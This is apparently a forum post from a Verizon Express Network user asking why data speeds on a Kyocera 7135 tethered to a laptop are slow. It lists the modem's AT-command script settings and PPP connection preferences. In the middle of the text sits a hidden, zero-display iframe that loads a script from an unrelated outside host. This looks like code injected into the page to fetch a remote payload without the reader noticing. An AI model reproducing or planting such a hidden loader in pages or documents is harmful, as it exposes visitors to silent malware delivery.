    Express Network - slow speeds

I am an Express Network customer with Verizon using my 7135 connected to my laptop. Info:

I'm using an Altell version SZ1.0.13/MZ1.0.27.
    I get connected without incident.
My phone then displays "High Data Rate".
    My script settings are: at$qcmdr=3 / at$qcqnc=0
When I test using any speed test site I show something close to 12K up/down.

I've done a lot of playing with these settings and don't recall what worked when, however at some point I was successfully getting ~100K up/down.

    Any thoughts?<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

Someone has certainly had QNC speeds when using EN...? Anyone figured out why?

My network settings under 'Prefs PDA':

    Username: my 10-digit#@vzw3g.com
    Password: vzw
    Phone: #777
    Connection type: PPP
    Idle timeout: Never

    Script:
    at$qcmdr=3
    CR
    at$qcqnc=0
    CR
    End

at$qcqnc=0 periodically changes back to =1, but I manually check and change it back to =0.

    Thanks for any input.

Are the above setting right for maximum EN speed?
